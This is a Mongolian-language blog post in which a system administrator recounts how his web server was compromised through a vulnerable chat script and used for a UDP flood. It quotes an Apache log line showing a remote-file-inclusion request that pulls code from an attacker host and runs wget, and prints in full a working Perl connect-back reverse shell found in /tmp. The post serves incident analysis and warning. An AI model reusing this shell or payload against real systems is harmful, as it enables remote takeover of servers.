Саяхан нэг өдөр хостинг компаниас имэйл ирэв. Унштал танай серверээс хөрш сервер руу flood аттак хийсэн байна. Уг аттак хийсэн хэрэглэгчийг устгах буюу шаардлагатай арга хэмжээг яаралтай авна уу гэж байна.
2006-09-23 18:57:55.622633 MYHOST -> TARGETHOST IP Fragmented IP protocol (proto=UDP 0x11, off=50320)
2 2006-09-23 18:57:55.622637 MYHOST -> TARGETHOST IP Fragmented IP protocol (proto=UDP 0x11, off=51800)
4 2006-09-23 18:57:55.622641 MYHOST -> TARGETHOST IP Fragmented IP protocol (proto=UDP 0x11, off=53280)
6 2006-09-23 18:57:55.622741 MYHOST -> TARGETHOST IP Fragmented IP protocol (proto=UDP 0x11, off=54760)
.....
91.73 inbound Mbps to TARGETHOST
0.00 outbound Mbps from TARGETHOST
Серверт ороод системийн бүртгэлүүдийг (system logs) бүгдийг нь ухлаа даа. /tmp фолдероос хэдэн файл ачаалсан нь харагдав.
Apache хэрэглэгчээр /tmp дотор хэдэн скрипт файлыг upload хийчихжээ.
ls -a /tmp
.x dc.txt i.pl t.pl t.pl.1 w00t xxd.txt
Apache-ын бүртгэл дотор
/var/log/httpd/httpd-access_log.3:202.182.48.94 - - [14/Sep/2006:00:51:47 -0500] " GET /chatters/aedatingCMS2.php?dir[inc]=http://HACKERHOST/thekuntul/aa.txt?& cmd=uname%20-a; id; cd%20/var/www/html/chatters/patServer; wget%20HACKERHOST/supernova/psy.tar.gz HTTP/1.0" 200 3316
гэсэн мөр олдов. Манай нэг кодер open source chat script туршиж байгаад орхисон байсан нь upload хийгддэг алдаатай код байж л дээ.
cat dc.txt
#--==Shell==--
#
$system = '/bin/sh';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
Ай шибаал гэж, ингээд л нэг гарыг серверт apache хэрэглэгчээр shell команд горим ачаалуулчихсан байваа.
Хамгийн их довтолгоонд өртдөг нь веб сервер учраас түүнийхээ хамгаалалтыг байнга чангатгаад байж дээ. Сис админ-уудаа!
Бичлэг таалагдсан бол сурталчилгаан дээр +1 дарж тус хүргээрэй ;)
0 Comments:
Post a Comment